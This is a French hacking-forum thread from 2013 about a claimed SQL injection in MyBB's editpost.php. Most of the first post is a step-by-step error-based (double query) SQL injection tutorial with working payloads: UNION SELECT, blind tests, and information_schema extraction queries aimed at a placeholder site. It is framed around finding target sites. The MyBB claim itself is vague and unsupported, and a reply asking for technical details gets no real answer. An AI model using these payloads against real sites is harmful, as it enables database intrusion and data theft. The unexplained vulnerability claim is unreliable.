Mybb editpost.php
|
23-08-2013, 10h15
(Modification du message : 23-08-2013, 13h51 par Yuri.)
Message : #1
|
|
Yuri
Czech Membre Messages : 53 Sujets : 7 Points: 4 Inscription : Aug 2013 |
Mybb editpost.php
Vulnerable code: MyBB <1.6.9 is vulnerable to Stored, Error based, SQL Injection.
[spoiler]Error based sql injection tutorial - Double query injection Vous aurez besoin d'une cible comme celle-ci Citation :www.site.com/thegame.php?i=36 Ensuite comme pour l'injection basic, insérez caractère spécial ici le ( ' ). Citation :www.site.com/thegame.php?i=36' Nous avons donc la fameuse syntax error SQL. Maintenant Yuri vous dit d'injecter ceci :p Vous dites Ok on va injecter ! ( ironie ) Citation :www.site.com/thegame.php?i=36 order by 10-- aucune erreur Dah fuck ? Essayons ça alors :o Citation :www.site.com/thegame.php?i=36' order by 100--+ Ah enfin :p Maintenant, nous avons une erreur dans les colonnes. Maintenant, go obtenir les colonnes : Citation :www.site.com/thegame.php?i=36' order by 10--+ erreur Ok trouver nombre de colonnes [ FAIT ] prochaine étape à l'aide de la commande d'union nous allons trouver la colonne VULN !! Citation :www.site.com/thegame.php?i=36' union select 1,2,3,4,5--+ Et BOOM ça faits des chocapics ! Alors, pouvons-nous utiliser une autre méthode comme celle en aveugle Voyons cela ? Citation :www.site.com/thegame.php?i=36' and 1=1--+ c'est vrai donc aucune erreur Citation :www.site.com/thegame.php?i=36' and 1=2--+c'est faux et aucune erreur humm Est-ce que nous devrions abandonner et de trouver d'autres sites? Non, essayons autre méthode appelée ERROR BASED INJECTION(DOUBLE QUERY) Dans cette méthode, nous utilisons la syntaxe spécifique pour obtenir des données de base de données Le code que nous utilisons pour obtenir la version, base de données et aslo utilisateur -> Code : and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,cast(version() as char),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1 DAH FUCK c'est quoi ça O_O Ecoute essaye ça sur notre site :p Citation :http://www.site.com/thegame.php?i=36' and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,cast(version() as char),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1--+ Nous n'avons pas utilisé hex Code : 0x7e,0x27 Citation :http://www.site.com/artist.php?i=36' and(select 1 from(select count(*),concat((select (select concat(version())) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1--+ Il fonctionne bien, mais il ya un autre problème que vous devez savoir on efface la valeur hexadécimale du résultat de code de celui-ci comme : Comme vous le voyez, nous avons foregner "1" près de nom de version et il restera pour tous nos résultats ainsi il peut se confondre quelqu'un qui démarre nouveau ce type d'injection. Dans ce tutoriel, je vous écris tout syntaxe avec valeur hexadécimale [/spoiler] Ici c'est le même principe sauf que nous sommes dans un l'altérage de donnés le trucage de donnée OoO /editpost.php Code : === Utiliser Tamper Data (ou en-têtes HTTP en direct), lors de la partie soumettre un message, modifiez le paramètre POST 'posthash' à votre charge, altéré, puis éditer votre message. [align=center] L'exploit est exécutable sous une console ruby ou perl sans payload comme démontre sous metasploit ça a marché sous résever d'un exploit. |
|
23-08-2013, 12h45
Message : #2
|
|
gruik
gouteur de savon Messages : 757 Sujets : 44 Points: 482 Inscription : Oct 2012 |
RE: Mybb editpost.php
ça concerne quelles versions de MyBB ?
tu peux donner des détails techniques sur comment fontionne la faille ? pourquoi/comment dans le code source par exemple ? |
|
23-08-2013, 13h49
Message : #3
|
|
Yuri
Czech Membre Messages : 53 Sujets : 7 Points: 4 Inscription : Aug 2013 |
RE: Mybb editpost.php
Edit, tutoriel sur l'error based
Citation :" Pour apprendre à boxer il suffit d'une nuit. Il faut une vie entière pour apprendre à combattre. " |
|
« Sujet précédent | Sujet suivant »
|
Sujets apparemment similaires… | |||||
Sujet | Auteur | Réponses | Affichages | Dernier message | |
MyBB 1.6.10 Bypass CSRF Protection | 0pc0deFR | 9 | 447 |
27-08-2013, 13h11 Dernier message: kallimero |
|
FPD sur MyBB 1.6.8 et supérieur | InstinctHack | 3 | 233 |
22-08-2013, 23h13 Dernier message: Di0Sasm |
|
shoutbox mybb | InFamouZz | 8 | 425 |
14-01-2013, 23h22 Dernier message: InFamouZz |
Utilisateur(s) parcourant ce sujet : 1 visiteur(s)